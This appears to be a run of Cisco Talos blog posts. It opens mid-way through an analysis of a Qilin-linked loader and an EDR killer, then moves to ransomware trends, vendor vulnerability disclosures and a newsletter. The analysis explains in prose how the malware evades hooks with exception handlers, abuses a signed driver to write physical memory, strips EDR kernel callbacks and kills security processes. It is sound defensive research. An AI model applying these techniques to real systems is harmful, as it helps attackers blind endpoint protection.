It modifies the “shell32.dll” name in memory to “hasherezade_[redacted].dll”, then adjusts RIP in the context record to point to the next ret instruction (0xC3) within the NtOpenSection stub and sets a new hardware breakpoint on NtMapViewOfSection. In addition, it updates the stack pointer to reference LdrpMinimalMapModule+offset, where the offset corresponds to an instruction immediately following a call to NtOpenSection inside LdrpMinimalMapModule. It then invokes NtContinue, which resumes execution at the RIP value stored in the context record (i.e., at the ret instruction). That ret instruction subsequently transfers control to the address prepared on the stack, namely LdrpMinimalMapModule+offset.

cr_1->rsp = LdrpMinimalMapModule+offset
cr_1->rip = ntdll!NtOpenSection+0x14 = ret ; jumps to <rsp> when executed

During execution of LdrpMinimalMapModule, a call to NtMapViewOfSection is made, which triggers the hardware breakpoint set by the previous routine. On this occasion, the VEH executes the code in Figure 31.

It deletes all HW breakpoints and then sets the stackpointer to an address which points to an address in LdrMinimalMapModule+offset. As expected, this is right after a call to NtMapViewOfSection. In other words, the registers in the context are overwritten like this:

ctx->rsp -> ntdll!LdrpMinimalMapModule+0x23b
ctx->rip -> ntdll!NtMapViewOfSection+0x14 = ret

When the return (ret) instruction is reached, it jumps to the address stored in the stack pointer (rsp).

The subsequent code in LdrpMinimalMapModule maps the previously restored PE image into the process address space and prepares it for execution. Finally, control returns to 0x24A3C1E, the instruction immediately following the call that originally triggered the first hardware breakpoint.

After several additional fix-up steps, the loader transfers execution to Stage 4 (i.e., the loaded PE image).

This PE file is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of solutions. A detailed analysis of this component will be provided in the next section.

PE loader summary

The first three stages of this binary implement a sophisticated and complex PE loader capable of bypassing common EDR solutions by evading user-mode hooks through carefully crafted SEH and VEH techniques. While these methods are not entirely novel, they remain effective and should be detectable by properly implemented EDR solutions.

The loader decrypts and executes an embedded PE payload in memory. In this campaign, the payload is an EDR killer capable of disabling over 300 different EDR products. This component will be analyzed in detail in the next section.

EDR killer

Stage 4: Extracted EDR killer PE file

Besides initialization, the first thing the extracted PE from Stage 3 does is check again if the system locale matches a list of post-Soviet countries and, if it does, it crashes. This is another indicator that former stages are just a custom PE loader, which could be used to load any PE the adversaries want. Otherwise, doing the same check again is not logical.

The malware then attempts to elevate its privileges and load a helper driver. This also implies that the process must be executed with administrative privileges.

The “rwdrv.sys” driver is a renamed version of “ThrottleStop.sys”, originally distributed by TechPowerUp LLC and signed with a valid digital certificate. It is legitimately used by tools such as GPU-Z and ThrottleStop. This is not the first observed abuse of this ; it has previously been leveraged in several malware campaigns.

Despite its benign origin, the driver exposes highly powerful functionality and can be loaded by arbitrary user-mode applications. Critically, it implements these capabilities without enforcing meaningful security checks, making it particularly attractive for abuse.

This driver exposes a low-level hardware access interface to user mode via input/output controls (IOCTLs). It allows a user-mode application to directly interact with system hardware.

The driver implements IOCTL handlers that provide the following capabilities:

• I/O port access
  • Read from hardware ports (inb/inw/ind)
  • Write to hardware ports (outb/outw/outd)
• CPU Model Specific Register (MSR) access
  • Read MSRs (__readmsr)
  • Write MSRs (__writemsr) with limited protection against modifying critical syscall/sysenter registers
• Physical memory/MMIO access
  • Map arbitrary physical memory into kernel space using MmMapIoSpace
  • Create a user-mode mapping of the same memory using MmMapLockedPagesSpecifyCache
  • Maintain up to 256 active mappings per driver instance
  • Provide an IOCTL to release/unmap those mappings
• Direct physical memory access
  • Read physical memory values
  • Write physical memory values
• PCI configuration space access
  • Read PCI configuration registers (HalGetBusDataByOffset)
  • Write PCI configuration registers (HalSetBusDataByOffset)

Additionally, the driver tracks the number of open handles and associates memory mappings with the calling process ID.

Overall, the driver functions as a generic kernel-mode hardware access layer, exposing primitives for port I/O, MSR access, physical memory mapping, and PCI configuration operations. Such functionality is typically used by hardware diagnostic tools, firmware utilities, or low-level system utilities, but it also provides powerful primitives that could be abused if accessible from unprivileged user-mode.

The two important functions heavily used by the sample are the ability to read and write physical memory.

After loading the driver, the malware proceeds to determine the Windows version. To do so, it first resolves the required API function using a PEB-based lookup routine, a technique consistently employed throughout the sample.

The implementation parses the Process Environment Block (PEB) and locates the target module by finding the hash of its name. Then the ResolveExportByHash function takes the module base from the previously found DLL and parses its PE header to find the function that corresponds to the function hash. It can either provide the API function address as an PE offset or as a virtual address.

After a couple of initializations and checks, it gets the “rwdrv.sys” handle, followed by the EDR-related part of the sample — the kernel tricks which are responsible for avoiding, blinding, and disabling the EDR.

However, let’s have a brief look into the details. It starts with building a vector of physical memory pages. This vector will later be used in subsequent methods.

The SetMemLayoutPointer function in the if statement above leverages the NtQuerySystemInformation API function to gather the Superfetch information about the physical memory pages. It stores a pointer to this information in global variables (mem_layout_v1_ptr or mem_layout_v2_ptr). Which one is used depends on the version variable which is the argument handed over to the function. In our case, 1 is for calling the function the first time and 2 is for the second time. In other words, it brute-forces whichever version works for the Windows system it is running on.

The BuildSuperfetchPfnMetadataList function is quite large and complex. Simplified, it starts by using the mem_layout pointer to calculate the total page count.

It then ends by using NtQuerySystemInformation again to get the physical pages and their meta data to store this information in a global vector (g_PfnVector).

Back to the block from the above, the next step blinds the EDRs by deleting their callbacks for certain operations (e.g., process creation, thread creation, and image loading events).

The unregister_callbacks function iterates through a list of over 300 driver names which are stored in the sample.

It also demonstrates the overall implementation of the malware, which is also used in several other functions. It uses a certain API function to calculate an offset to the function or object it is really using — in this case, the kernel callback cng!CngCreateProcessNotifyRoutine. It also does not touch this object in the process virtual address space. It uses the driver loaded earlier (“rwdrv.sys”) to get the physical memory address of it. The logic and driver communication is implemented in the read_phy_bytes function, and the same for overwriting memory; the write_to_phy_mem function is used to handle the driver communications. The DeviceIoControlImplementation function which talks to the driver is implemented in write_to_phy_mem.

The other callback-related functions shown in Figure 44 work similarly to the one we discussed. They overwrite or unregister other EDR-specific callbacks, which were set by the EDR Mini-Filter driver.

The final part of the EDR killer begins by loading another driver (“hlpdrv.sys”).

The malware uses the driver to terminate EDR processes running on the system using the IOCTL code 0x2222008. This executes the function in the driver which is responsible for unprotecting and terminating the process.

Once terminated, EDR processes such as Windows Defender no longer run, as demonstrated in Figure 56.

Additionally, it restores the CiValidateImageHeader callback. The RestoreCiValidateImageHeaderCallback function is shown in Figure 57.

This is accomplished using the same concept we previously saw in Figure 52:

• Resolve a known API function.
• Use this function as an anchor point to locate a specific instruction within its code.
• This instruction contains a pointer in one of its operands that points to, or near, the object of interest.
• Identify the pointer to the target object within that instruction.
• Perform a sign extension on the operand.
• Add an additional offset to compute the final address of the object being sought — in this case, the CiValidateImageHeader callback.
• Restore the original function pointer to CiValidateImageHeader.

Note that the malware had previously overwritten the callback to CiValidateImageHeader with the address of ArbPreprocessEntry, a function that always returns true. In other words, it has now restored the original Code Integrity check.

Summary

This blog was a technical deep dive into the infection chain that is hidden in the malicious “msimg32.dll”, which has been observed during Qilin ransomware attacks. It demonstrates the sophisticated tricks the malware is employing to circumvent or completely disable modern EDR protection features on compromised systems.

It is encouraging to see how many hurdles modern malware must overcome. At the same time, this highlights that even state-of-the-art defense mechanisms can still be bypassed by determined adversaries. Defenders should never rely on a single product for protection; instead, Talos strongly recommends a multi-layered security approach. This significantly increases the difficulty for attackers to remain undetected, even if they manage to evade one line of defense.

Coverage

The following ClamAV signatures detect and block this threat:

• Win.Malware.Bumblebee-10056548-0
• Win.Tool.EdrKiller-10059833-0
• Win.Tool.ThrottleStop-10059849-0

The following SNORT® rules (SIDs) detect and block this threat: 

• Covering Snort2 SID(s): 1:66181, 1:66180
• Covering Snort3 SID(s): 1:301456

Indicators of compromise (IOCs)

The IOCs for this threat are also available at our GitHub repository here.

msimg32.dll
MD5: 89ee7235906f7d12737679860264feaf
SHA1: 01d00d3dd8bc8fd92dae9e04d0f076cb3158dc9c
SHA256: 7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497

rwdrv.sys
MD5: 6bc8e3505d9f51368ddf323acb6abc49
SHA1: 82ed942a52cdcf120a8919730e00ba37619661a3
SHA256: 16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0

hlpdrv.sys
cf7cad39407d8cd93135be42b6bd258f
ce1b9909cef820e5281618a7a0099a27a70643dc
bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56

EDRKiller.exe (non-fixed memory dump with overlay)
MD5: 1305e8b0f9c459d5ed85e7e474fbebb1
SHA1: 84e2d2084fe08262c2c378a377963a1482b35ac5
SHA256: 12fcde06ddadf1b48a61b12596e6286316fd33e850687fe4153dfd9383f0a4a0
Time stamp: 0x684d33f0 (14. June 2025, 08:33:52 UTC)
ImpHash : 05aa031a007e2f51e3f48ae2ed1e1fcb
TLSH: T1B4647C01B7E50CF9EE77C638C9614A06EA72BC425761DADF43A04A964F237D09E3DB12

Every year, the Cisco Talos Year in Review captures the patterns shaping the threat landscape. The 2025 report paints a clear picture: Attackers are moving faster than ever, while using identity-related attacks as the primary battleground.  

To unpack the biggest takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security. 

Here’s their conversation. 

Old vulnerabilities, new speed 

Marshall:
 One of the clearest trends in this year’s data is the contrast in how vulnerabilities are being exploited. We saw React2Shell disclosed in December and within weeks it became the most targeted vulnerability we tracked. 

At the same time, a 12-year-old vulnerability still appeared in the top 10 most exploited list. So we’re seeing very rapid weaponization (likely fuelled by AI given the compressed timeline from initial proof of concept to large-scale exploitation, across multiple languages and platforms) alongside continued success with legacy flaws.  

Bailey:
 There’s always a lot of focus on the latest zero-day, and rightly so. The industrialization of vulnerability exploitation is extremely concerning. But at the same time, many attacks are still leveraging vulnerabilities that have been around for years.

Organizations are dealing with complexity. Large environments. Long device lifecycles. Change management processes that take time. But attackers don’t care about those constraints. They actually count on them. 

This is where we need to repeat that the fundamentals still matter. Patch management, asset visibility, lifecycle discipline... We still have work to do there as an industry.  

Marshall:
 And then you have 40% of the top 100 exploited vulnerabilities being effective because organizations were running end-of-life devices. That’s a measurable problem. When infrastructure is no longer supported, attackers know it. They scan for it, and then they target it. Technical debt becomes operational risk.  

Bailey:
 Absolutely. In most cases, it’s not that customers don’t want to patch. It’s that their critical networking infrastructure has been stable for years, and taking it offline can disrupt the business. 

As an industry, we need to reduce that friction. Cisco is a big part of that, with built-in protections in our networking equipment that can be applied without downtime, and options to shield systems when patching can'thappen immediately.  

Identity as the primary target 

Marshall:
 If there’s one area where attackers are consistently investing their time and energy, it’s identity. In 2025, identity-based attack techniques were central to major phases of operations, like lateral movement, privilege escalation, and persistence. Controlling identity effectively means controlling access across the environment.  

One of the most striking data points in the report is that fraudulent device registration increased 178 percent year over year. In many cases, attackers convinced administrators to register devices on their behalf through vishing (or voice phishing). They targeted administrator-managed registration flows at three times the rate of user-driven ones. There’s a clear preference for high-value victims. 

Bailey:
 And unfortunately these stolen credentials are widely available. Logging in is often easier than breaking in. Once attackers obtain legitimate access, they can blend in.  

For defenders, identity controls need to go beyond authentication. You need continuous monitoring. You need risk-based adjustments to access. You need to detect abnormal behavior quickly. 

Marshall:
 We’re also seeing a rise in internal phishing. More than a third of phishing incidents we observed involved attackers sending messages from already compromised accounts. 

Once inside, they create mailbox rules to hide replies and suppress visibility. They explore shared drives and collaboration platforms. They look for sensitive information that can help them expand access. This all means defenders need strong visibility into normal user behavior. If accounts suddenly start sending far more messages than usual or accessing data they never touched before, that should stand out. 

Bailey: 
Identity is no longer just an authentication problem. It’s a monitoring and governance problem, as well.  

State-sponsored activity and the blurring of motives 

Marshall:
 We observed continued evolution in state-sponsored activity throughout the year. Talos investigations into China-nexus campaigns increased nearly 75 percent in 2025. These actors are exploiting both zero-day and n-day vulnerabilities while also engaging in financially motivated activity to support their broader goals. 

Russian-linked activity continues to correlate closely with geopolitical developments. We consistently see these actors exploiting unpatched networking equipment to establish long-term access. 

North Korean affiliated actors refined their “Contagious Interview” campaigns. They compromised developers through fake job opportunities and expanded IT worker schemes using AI-generated personas. 

Iranian-linked actors increased hacktivist-style operations by roughly 60 percent last year, and we’ve seen that type of activity rise again during the ongoing conflict in the Middle East. At the same time, actors such as ShroudedSnooper are deploying highly evasive and stealthy backdoors to maintain long-term access to critical telecommunications infrastructure. 

Bailey:
 These groups are adaptive and pragmatic. From a defender’s perspective, the distinction between state-sponsored and criminal actors is less useful than it used to be. Techniques overlap, tools are shared, and infrastructure gets reused.  

What matters is speed. These actors move quickly and often target the edge of the network through unpatched devices and legacy infrastructure.   

That’s where intelligence becomes critical. At Cisco, when Talos identifies a campaign or toolset, that intelligence feeds directly into protections for customers. Speed of detection and response must match the pace of the threat.  

AI and the acceleration of attacks 

Marshall:
 In 2025, AI was most commonly used to automate and scale parts of traditional attacks, especially social engineering. It lowered the barrier to creating convincing phishing lures and fraudulent sites. 

The Year in Review is based on trends throughout 2025, but we also want to call attention to the fact that the AI threat landscape is changing fast, even in the first few months of 2026. Research into threats like VoidLinkshows how AI can accelerate malware development. The tasks that previously required extended development cycles are now being completed quicker than ever.   

We’re also seeing early examples of AI-enabled malware in mobile environments. Agentic capabilities can analyze screen content and determine next actions. It’s still early, but the pace of change is notable. 

Bailey:
 Organizations also need to think about how they deploy AI internally. 

We saw rapid adoption of consumer AI tools, followed by a realization that guardrails were necessary. Prompt injection, data exposure, unauthorized model access... These are real concerns.  

Now we’re seeing companies implement controls such as semantic inspection of prompts, model scanning, and discovery of shadow AI deployments. Secure AI deployment will quickly become standard practice. It has to. 

Using the report as a prioritization tool 

Marshall:
 We designed the Talos Year in Review to help defenders prioritize. And in terms of those priorities, I’d like to leave people with a few that stand out. 

The data shows that attackers consistently pursue access for scale and leverage. They want the keys to the kingdom, so they target identity systems, administrators, and end-of-life infrastructure because it gives them broad access. 

Strengthening your identity controls, understanding your environment, and safeguarding and removing EOL infrastructure are three of the most important actions organizations can take. 

Bailey:
 I agree. Patching is still crucial, but just as important is ensuring you have visibility across devices, strong segmentation, and continuous monitoring for abnormal behavior. 

We’re also seeing attacks happening faster, increasingly amplified by automation and AI.  Agentic AI is opening the door to a catalogue of features that will automate manual work and allow adversaries to greatly expandtheir capabilities. Now more than ever, defenders need architectures that are resilient and observable in the face of these developments.  

I encourage everyone to read the full Talos report. It’s filled with data and practical guidance.   

Marshall:
  

Thank you, Peter. This report represents a tremendous amount of effort across Talos and it's built with our customers in mind. I'd like to extend a sincere appreciation to my team and all of our partners who contributed to its life and launch.  

Our goal with the Year in Review, much like our general mission at Talos, is simple: Show where adversaries are succeeding, and provide clear guidance on how to reduce that success rate.  

In addition, I would ask all of our customers to use this report to challenge us, challenge Cisco. We strive to give you the greatest protection, products, and services possible. Let us know how we can be better. 

Read the 2025 Cisco Talos Year in Review

Download now

Ransomware activity in Japan in 2025

In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging Qilin ransomware were observed most frequently. There were 134 ransomware incidents reported in Japan in 2025, representing a 17.5% year-over-year increase from 2024. Figure 1 presents the monthly number of ransomware incidents. The data was compiled based on information obtained from data leak sites, official disclosures by affected organizations, and publicly available media reports. On average, approximately 11 incidents were observed per month.

Industry-based analysis, as shown in Figure 2, indicates that manufacturing accounts for the largest share of affected organizations (28%). This is followed by automotive-related industries (8%), trading companies (7%), IT (6%), and education (5%). The data suggests that manufacturing and automotive-related sectors continue to be heavily targeted, consistent with last year.

Small- and medium-sized enterprises (based on capital) remained the primary targets of ransomware attacks at 57% of victim organizations, compared to 17% for large enterprises (see Figure 3).

Figure 4 highlights which ransomware groups targeted Japan in 2025. Qilin accounts for the largest share at 16.4% of all incidents, representing approximately four times the number of cases attributed to Lynx, the second most active group. While Qilin caused the highest number of incidents, the data also indicates that many other ransomware groups are actively targeting organizations in Japan.

Factors behind Qilin’s growing attack activity

In 2025, Qilin became the ransomware group responsible for the highest number of victims worldwide. In October alone, the number of victim organizations listed on its leak site exceeded approximately 200 (see Figure 5).

Below, Talos examines the reasons behind Qilin’s significant increase in attack volume from three key perspectives.

First, Qilin primarily relies on stolen credentials to gain initial access. In the example shown in Figure 6, credentials were obtained through platforms such as Telegram, Breach Forums, and other online platforms. After successfully breaching a target environment, the group places considerable emphasis on post-compromise activities, allowing it to methodically expand its control and maximize impact.

Second, posts suggesting that the operators are mindful of penetration testers indicate a relatively high level of operational maturity. This awareness implies that Qilin likely maintains well-developed attack manuals that function as practical, step-by-step references for conducting intrusions efficiently.

Finally, 2025’s statistics show that Qilin most frequently targets industries such as manufacturing; professional, scientific, and technical services; wholesale trade; health care and social assistance; and construction. Among these, health care and social assistance stands out as a particular focus, suggesting that Qilin tends to prioritize sectors where ransomware-induced operational disruptions can cause especially severe consequences.

Qilin affiliate use of EDR killer malware

Talos recently discovered a Qilin affiliate leveraging malware specifically designed to disable EDR on victim endpoints. This tooling is intended to bypass endpoint security monitoring and enable attackers to operate with reduced visibility on compromised systems. A detailed technical analysis of this malware is available in the following article.

The final payload deployed by this malware is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of commercial solutions.

The malware implements geo-fencing, specifically excluding systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the malware terminates if a locale from the exclusion list is detected. This indicates that the threat actor is specifically attempting to avoid infecting systems in this region, a tactic commonly used by threat actors in this region to avoid encouraging law enforcement action against their operation(s).

Threat detection during the pre‑ransomware phase

Based on Talos’ investigation of multiple Qilin cases, ransomware execution occurred on average approximately six days after the initial compromise. This highlights the critical need to detect attacker activity at the earliest possible stage and to disrupt their operations before ransomware deployment. However, to detect attacker activity at an early stage, it is also necessary to monitor the standard commands attackers commonly use. This approach carries the risk of generating many false positives and therefore requires careful consideration. To help reduce false positives, we recommend the following three approaches:

• Trigger alerts based on the correlation of multiple events.
• Determine whether an account is deviating from its expected role.
• Whether the execution occurred outside of normal operating hours.

For example, attackers often create user accounts using commands such as the following, which makes it important to have a mechanism in place to verify whether these accounts are legitimate.

Figure 13 shows the detection points within the tactics, techniques, and procedures (TTPs) of the pre-ransomware stage of Qilin attacks. In this example, we define the pre-ransomware phase as the period prior to the execution of ransomware, covering the stages from Initial Access through the execution of SystemBC . For details on the attack chain from the initial intrusion to the execution of the Qilin ransomware, please refer to the following blog.

In this blog, we share a total of 12 Sigma rules, some of which are accompanied by correlation rules to help reduce false positives.

In the example shown in Figure 14, the rule is designed to detect the use of the net user command. However, if this rule is used on its own, it may also trigger alerts when the command is executed by legitimate administrators. The correlation rules are tuned based on analysis of log data. For the correlation rule associated with the net user command, an alert is generated only when the command is executed at least three times within a 15-minute time window (see Figure 15).

The Sigma and YARA rules are published here. Please adjust them according to your organization’s environment.

For more information on the defensive approaches discussed in this blog and Qilin's detailed TTPs, please refer to the related materials for more details.

Coverage

The following ClamAV signatures detect and block this threat:

Win.Malware.Bumblebee-10056548-0
Win.Tool.EdrKiller-10059833-0
Win.Tool.ThrottleStop-10059849-0

The following SNORT® rules (SIDs) detect and block this threat: 

Covering Snort 2 SID(s): 66181, 66180
Covering Snort 3 SID(s): 301456

Indicators of compromise (IOCs)

The IOCs can also be found in our GitHub repository here.

Ransomware attacks aren’t smash-and-grab anymore. They’re built on access that already looks legitimate — closer to positioning chess pieces than breaking the door down.

That’s the big trend that comes through in the ransomware data from the Talos 2025 Year in Review. Once attackers have initial access (and 40% of the time it’s through phishing) they move the way a user or administrator would: logging in, checking systems, and using the same remote access tools that are already installed.

In fact, one of the biggest challenges for defenders today is that ransomware actors are deliberately trying to overlap with everyday activity. RDP, PowerShell, and PsExec are the top three tools that are used by ransomware actors, but in many environments, these tools are part of normal operations.

The difference is how they’re being used. If they’re being used to expand access and move across systems, this should raise a few red flags. I’m not sure it’s possible to emphasise enough how important your asset management comes into play here — having clear asset inventories and network behaviour baselines and conducting continuous anomaly monitoring.

Like the rest of the Talos Year in Review, identity is what ties everything together. Valid accounts show up across nearly every stage of ransomware attacks: initial access, lateral movement, and execution. 

Top-targeted sectors

From our ransomware data analysis, manufacturing continues to be the most targeted sector, which reflects how challenging these environments are to monitor closely. There’s a mixture of systems, users, and processes, often with limited tolerance for disruption.

Professional, scientific, and technical services (second on the most targeted sectors list) face similar exposure, especially when access spans multiple systems or organizations.

Most prolific ransomware groups

The ransomware-as-a-service (RaaS) groups have had a bit of a shakeup. After LockBit topped our 2024 report, the group fell to 35^th this year following sustained law enforcement pressure. Qilin, a constant pain in the “you-know-what” for our incident responders for over a year now, came in at No. 1.

Qilin uses a double-extortion approach, combining data encryption with threats to release stolen information publicly. According to their data leak site, in 2025, Qilin targeted more than 40 victims every month except January, signaling that this ransomware group will remain a persistent and significant threat in 2026.

Akira and Play (No. 2 and 3 in the chart) had continued success, which can likely be credited to their evolving and adaptable tactics and absorption of affiliates from defunct ransomware groups (i.e., LockBit).

An opportunity for defenders

What’s interesting to note is that for the second year running, January saw lower activity, likely tied to holiday slowdowns and Eastern European public holidays.

It may be wise for security teams to consider testing ransomware defenses in months where activity levels are generally lower, such as January, as there is a reduced chance of interfering with real incidents.

Defender recommendations

• Strengthen identity protections. Actors predominately targeted the person who holds the key rather than the lock itself (i.e., the target’s infrastructure). Phishing and social engineering training is highly recommended.
• Monitor the use of built-in administrative tools such as RDP, PowerShell, and PsExec for lateral movement. Look for unexpected usage patterns, and abnormal access requests.
• Basics, basics, basics! They very much still hold true. Strengthen your backup, EDR, segmentation, logging, and recovery capabilities.
• Regularly test ransomware response readiness.

Read the full 2025 Talos Year in Review to dig deeper into ransomware trends, vulnerability exploitation, phishing and MFA bypass, state-sponsored activity, and how AI is shaping the threat landscape.

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed a vulnerability in HikVision, as well as 10 in TP-Link, and 19 in Canva.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

Canva Affinity vulnerabilities

Discovered by KPC of Cisco Talos.

Canva Affinity is a free-to-use tool for pixel and vector art manipulation used in graphic and document design.

Talos researchers found 19 vulnerabilities in Affinity. Eighteen of them are out-of-bounds read vulnerabilities in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit these vulnerabilities to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.

• TALOS-2025-2311 (CVE-2025-64776)
• TALOS-2025-2310 (CVE-2025-64301)
• TALOS-2025-2300 (CVE-2025-64733)
• TALOS-2025-2319 (CVE-2025-66042)
• TALOS-2025-2321 (CVE-2025-62403)
• TALOS-2025-2314 (CVE-2025-58427)
• TALOS-2025-2298 (CVE-2025-62500)
• TALOS-2025-2299 (CVE-2025-61979)
• TALOS-2025-2317 (CVE-2025-61952)
• TALOS-2025-2316 (CVE-2025-47873)
• TALOS-2025-2318 (CVE-2025-66503)
• TALOS-2025-2324 (CVE-2026-20726)
• TALOS-2025-2301 (CVE-2025-66000)
• TALOS-2025-2320 (CVE-2025-65119)
• TALOS-2025-2325 (CVE-2026-22882)
• TALOS-2025-2315 (CVE-2025-66617)
• TALOS-2025-2313 (CVE-2025-66633)
• TALOS-2025-2312 (CVE-2025-64735)

The last vulnerability is TALOS-2025-2297 (CVE-2025-66342), a type confusion vulnerability in the EMF functionality of Canva Affinity. A specially crafted EMF file can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution.

TP-Link vulnerabilities

Discovered by Lilith >_> of Cisco Talos.

The TP-Link Archer AX53 is a dual band gigabit Wi-Fi router. Talos researchers found 10 vulnerabilities in the router functionality.

TALOS-2025-2290 (CVE-2025-62673) is a stack-based buffer overflow vulnerability in the tdpServer ssh port update functionality of Tp-Link AX53. A specially crafted network packet can lead to stack-based buffer overflow.

These eight vulnerabilities exist in the tmpServer opcode of the AX53:

• TALOS-2025-2283 (CVE-2025-59482): Buffer overflow
• TALOS-2025-2284 (CVE-2025-62405): Stack-based buffer overflow
• TALOS-2025-2285 (CVE-2025-59487): Write-what-where
• TALOS-2025-2286 (CVE-2025-61983): Out-of-bounds write
• TALOS-2025-2287 (CVE-2025-62404): Stack-based buffer overflow
• TALOS-2025-2288 (CVE-2025-61944): Out-of-bounds write
• TALOS-2025-2289 (CVE-2025-58455): Stack-based buffer overflow
• TALOS-2025-2294 (CVE-2025-58077): Heap-based buffer overflow

A specially crafted set of network packets can be sent to trigger these vulnerabilities, which can lead to arbitrary code execution.

TALOS-2025-2291 (CVE-2025-62501) is a misconfiguration vulnerability in the SSH Hostkey functionality. A specially crafted man-in-the-middle attack can lead to credentials leak.

HikVision buffer overflow vulnerability

Discovered by a member of Cisco Talos.

HikVision creates AI-trained machine perception for use in security surveillance and other monitoring hardware, including Ultra Face Recognition Terminals for authentication.

Talos researchers found TALOS-2025-2281 (CVE-2025-66176), a stack-based buffer overflow vulnerability, in the SADP XML parsing functionality of Hangzhou Hikvision Digital Technology Co., Ltd. Ultra Face Recognition Terminal 3.7.60_250613 and Face Recognition Terminal for Turnstyle 3.7.0_240524 (under emulation). A specially crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability.

Welcome to this week’s edition of the Threat Source newsletter. 

Anyone who spoke with me in the last several weeks has had to deal with me loudly waiting in anticipation for the long-awaited “Project Hail Mary” movie adaptation. I read (and cried over) the book by Andy Weir, who’s also the author of “The Martian,” about a year ago and, shortly after, found out it was being made into a movie. 

(I know what you’re thinking: Two movie-themed editions in two weeks? It’s every cinephile’s dream!) 

Anyway, the story centers around a biologist and science teacher named Ryland Grace (Ryan Gosling), who wakes up from a coma on a spaceship lightyears away from Earth, his two crewmembers long dead. Our planet’s sun is slowly dimming, its energy being consumed by alien microbes called “astrophage” that are infecting all the stars in our stellar neighborhood — except one. Grace’s task is to figure out why this star is unaffected and send the solution back to Earth. It's a one-way trip, and he’ll eventually die in space alone... or so he thinks. 

The movie met 99.9% of my expectations, which is rare for an adaptation. The humor was spot-on, the soundtrack was gorgeous, and the puppetry — yes, the puppetry (mild spoilers for Rocky, Grace’s new alien friend) — was out-of-this-world. 

While it is a story about space, it’s first and foremost about communication, trust, and collaboration — things we’re no strangers to at Talos, especially when creating the Year in Review report (which is available now). The entire processof creating this report, from raw data to final design, is only a little bit less monumental than stopping alien microbes from plunging the earth into an ice age. 

The process begins with Talos’ Strategic Analysis team, who leverage the vast amount of Cisco’s telemetry, Talos research, and data from Talos Incident Response cases to analyze trends over the past year. This analysis is synthesized into a comprehensive report, which undergoes rigorous review and proofing at multiple levels. While the report is being drafted, the Strategic Comms team develops a detailed schedule of content and collateral to promote it both internally and externally, meeting weekly to track our progress. Once the text is finalized, it moves to our design team, who transform the data into a visually stunning, accessible format. Even after the report launches, the work continues: We produce videos, answer your questions on Reddit (today only!), record podcasts, create social media graphics, and collaborate across Cisco to ensure our findings reach the right people. 

We do this for the good of the community. Our report isn’t gated, and it never will be; you can read it right in your browser without filling out fake names and emails in annoying forms. Talos’ job is to keep as many people as safe as possible, and that means free access to critical information. Here's a taste of our findings: 

• React2Shell was the No. 1 most targeted CVE in 2025 despite only being discovered in December. ToolShell was No. 3 despite being released in June. 
• About 25% of the vulnerabilities on our top 100 list affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks. 
• Nearly a third of MFA spray attacks targeted identity and access management (IAM) applications. 
• Attackers continued to rely heavily on phishing for initial access, observed in 40% of Talos IR cases. 35% of cases involved internal phishing. 
• Qilin was the most seen ransomware variant in 2025, with over 40 victims each month except January. 

We also offer insights on AI and state-sponsored threats, so be sure to view the full report. 

In “Project Hail Mary,” Grace and his alien friend, Rocky, realize that they can't save their respective worlds alone. The Talos Year in Review is the result of a massive, cross-functional mission. It takes collaboration between all of Talos’ teams to turn complex, often daunting telemetry into actionable intelligence for the community. 

When we share knowledge, communicate clearly, and work together, the results are, to quote Rocky, “Amaze! Amaze! Amaze!” 

Stay tuned over the coming days and weeks as we break each section down into the most important 2025 Year in Review findings you need to know.

The one big thing 

One of the main themes from the 2025 Year in Review's vulnerability data is that attackers are targeting identity by compromising the infrastructure that sits around it, including physical hardware devices, software, and management platforms. Network components act as de facto identity gateways, allowing adversaries to impersonate users, bypass MFA, and traverse networks undetected. Attackers overwhelmingly prefer high-access targets that require minimal exploitation steps and yield maximum operational payoff. 

Why do I care? 

Identity-centric network components act as control points for the entire environment, meaning their compromise can invalidate MFA, bypass segmentation, and grant immediate access to high-value resources. Network management platforms give adversaries direct access to privileged administrative functions, device credentials, and automation pipelines that touch hundreds of downstream systems. Compromising a single ADC or management platform can expose dozens of downstream systems, making these devices powerful force multipliers. 

So now what? 

Organizations should consider the impact on identity when prioritizing the patching of network devices. ADCs must be protected as identity control points, not merely performance appliances. Defenders should focus on these high-leverage vulnerability classes that enable identity compromise, policy manipulation, and infrastructure-wide escalation. Read the full Year in Review for more information.

Top security headlines of the week 

U.S. Department of Energy publishes five-year energy security plan 
The three goals are to develop ‘world-class’ security technologies, to harden the US energy infrastructure, and establish emergency preparedness for response and recovery from incidents. (SecurityWeek) 

Someone has publicly leaked an exploit kit that can hack millions of iPhones 
Researchers are warning that this will allow any hacker to easily use the tools to target iPhone users running older versions of Apple’s operating systems who have not yet updated to its latest iOS 26 software. (TechCrunch) 

Checkmarx KICS code scanner targeted in widening supply chain hit 
Specifically, the cybercriminals infiltrated KICS GitHub Action, which organizations use to run KICS scans within their CI/CD pipelines, and poisoned multiple versions of the software. (Dark Reading) 

Attackers hide infostealer in copyright infringement notices 
Aimed at organizations in critical sectors, including healthcare, government, hospitality, and education, it attempts to install PureLog Stealer, a low-cost infostealer easy for threat actors to use. (Dark Reading) 

Oracle releases emergency patch for critical identity manager vulnerability 
CVE-2026-21992 can be used without authentication for remote code execution and it may have been exploited in the wild. (SecurityWeek) 

Can’t get enough Talos? 

Today only: Ask us anything 
